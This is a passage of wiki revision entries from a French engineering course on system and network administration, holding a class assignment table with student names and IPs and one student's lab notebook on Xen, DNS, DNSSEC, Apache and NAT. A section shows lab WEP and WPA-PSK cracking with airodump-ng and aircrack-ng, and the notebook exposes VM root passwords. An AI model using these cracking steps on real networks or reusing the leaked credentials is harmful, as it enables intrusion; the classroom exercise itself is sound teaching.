</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&diff=12162
SE4 IdO sécurité système/réseau 2025/2026
2026-02-10T15:20:13Z
<p>Cpayet : /* Plan d'adressage */</p>
<hr />
<div>= Répartition des binômes pour les travaux pratiques "administration système et réseau" =<br />
<br />
Préfixe des noms de machine : <code>SE4</code>.<br />
<br />
Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elève !! Nom de domaine<br />
! Nom de machine de services !! Nom de machine mandataire<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice<br />
|-<br />
|}<br />
<br />
{| class="wikitable"<br />
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves <br />
|-<br />
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE<br />
|-<br />
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST<br />
|-<br />
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE<br />
|-<br />
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI <br />
|-<br />
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN<br />
|-<br />
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki<br />
|-<br />
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.<br />
|-<br />
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi <br />
|-<br />
|}<br />
<br />
= Tableau des commutateurs virtuels =<br />
<br />
{| class="wikitable"<br />
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé <br />
|-<br />
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24<br />
|-<br />
|PAYET / DELOBELLE<br />
|pont_pacman<br />
|192.168.10.0/24<br />
|-<br />
|MERIEN / VANGHELUWE<br />
|pont_pere<br />
|192.168.0.0/24<br />
|-<br />
|CHEKLAT / BIERNACKI<br />
|pont_ironman<br />
|192.168.69.0/24<br />
|-<br />
|SALHI<br />
|pont_msalhi<br />
|192.168.20.0/24<br />
|-<br />
|GOURVEST/GHAZALI<br />
|pont_diviseur<br />
|192.168.67.0/24<br />
|-<br />
|YAHIANI / TEPELI<br />
|pontclio<br />
|192.168.7.0/24<br />
|-<br />
|GAUTHIER / SOUOP METSE<br />
|pont_rock<br />
|192.168.50.0/24<br />
|}<br />
<br />
= Tableau des réseaux virtuels =<br />
<br />
VLAN privés :<br />
<br />
{| class="wikitable"<br />
! Nom !! Numéro <br />
|-<br />
| VLAN1 || 1<br />
|-<br />
| MV-PROMO || 2 <br />
|-<br />
|E1-Pierre<br />
|11<br />
|-<br />
|E2-Agathe<br />
|12<br />
|-<br />
|E5-Cedric<br />
|15<br />
|-<br />
|E6-Thomas<br />
|16<br />
|-<br />
|E9-Aurele<br />
|19<br />
|-<br />
|E15-MSalhi<br />
|25<br />
|}<br />
<br />
VLAN communs avec l'école :<br />
<br />
{| class="wikitable"<br />
! Nom !! Numéro <br />
|-<br />
| INTERCO1 || 530 <br />
|-<br />
|}<br />
<br />
= Schéma de câblage =<br />
<br />
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.<br />
<br />
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.<br />
<br />
= Plan d'adressage =<br />
<br />
{| class="wikitable"<br />
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 <br />
|-<br />
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code><br />
|-<br />
| PoolPierre || <code>10.60.1.0/24</code> || </code>2001:660:4401:60a1::/64</code><br />
|-<br />
| PoolAgathe || <code>10.60.2.0/24</code> || </code>2001:660:4401:60a2::/64</code><br />
|-<br />
|PoolCédric<br />
|<code>10.60.5.0/24</code><br />
|2001:660:4401:60a5::/64<br />
|-<br />
|PoolThomas<br />
|<code>10.60.6.0/24</code><br />
|2001:660:4401:60a6::/64<br />
|-<br />
|}<br />
<br />
Adresses IPv4 des éléments réseau dans VLAN1<br />
<br />
{| class="wikitable"<br />
! Elément !! Adresse <br />
|-<br />
| Routeur C9200-E304 || 172.27.0.1/16<br />
|-<br />
| Routeur C9200-E306 || 172.27.0.2/16<br />
|-<br />
| Borne Wi-Fi E306 || 172.27.0.3/16<br />
|-<br />
| Borne Wi-Fi E304 || 172.27.0.4/16<br />
|-<br />
|}<br />
<br />
= Informations VRRP =<br />
<br />
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.<br />
<br />
== VLAN des machines virtuelles ==<br />
<br />
Une seule instance VRRP dans le VLAN des machines virtuelles.<br />
<br />
Adresse IPv4 virtuelle : <code>193.48.57.162</code><br />
<br />
{| class="wikitable"<br />
! Routeur !! IPv4 propre <br />
|-<br />
| C9200 E304 || <code>193.48.57.163</code><br />
|- <br />
| C9200 E306 || <code>193.48.57.164</code><br />
|-<br />
|}<br />
<br />
== VLAN ... ==</div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12157
Atelier SysRes SE4 2025/2026 E5
2026-02-10T15:13:54Z
<p>Cpayet : /* Effraction WiFi */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><syntaxhighlight lang="shell"><br />
Aircrack-ng 1.7 <br />
<br />
<br />
[00:26:11] Tested 835 keys (got 68980 IVs)<br />
Got 70001 out of 70000 IVsStarting PTW attack with 70001 ivs.<br />
KB depth byte(vote)<br />
0 0/ 13 FF(97024) A3(79616) D9(79360) C5(78848) 3A(78592) E3(78592) 29(78336) D1(78336) E9(78080) 7C(77568) DF(77568) 34(76800) 85(76800) D8(76544) 24(76032) <br />
1 0/ 1 CA(108544) CB(80128) B5(79104) EB(78336) 10(77824) A8(77312) E5(76800) F8(76800) E7(76544) EE(76544) 27(76288) 4C(76288) 68(76288) CC(76288) E6(76288) <br />
2 2/ 2 A4(80128) 3A(78336) 14(76800) 5A(76544) D2(76544) 98(76032) 08(75776) 1D(75776) 40(75776) 99(75776) E4(75776) F2(75776) CD(75520) F7(75520) 56(75008) <br />
3 0/ 1 D1(100608) 89(79872) 22(77568) 11(77056) A0(77056) 9E(76800) B0(76800) 98(76544) A9(76544) 5A(76032) AB(76032) CD(76032) 9A(75776) 4D(75520) 51(75264) <br />
4 7/ 4 43(77312) 4E(76800) 0F(76544) 29(76544) BA(76544) 3E(76032) 61(75776) A6(75776) C6(75776) 89(75264) 21(75008) 5A(75008) 65(75008) C8(75008) DD(75008) <br />
<br />
KEY FOUND! [ FF:FF:FF:FF:FA:BC:06:CB:AE:EE:EE:EE:EE ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
</syntaxhighlight><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
<br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
<br />
===== Sécurisation WiFi par WPA2-EAP =====<br />
Depuis notre machine de service on va se connecter sur notre borne wifi, ici on prend l'IP de la E304 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4</code><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12154
Atelier SysRes SE4 2025/2026 E5
2026-02-10T15:10:42Z
<p>Cpayet : /* Utiles */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
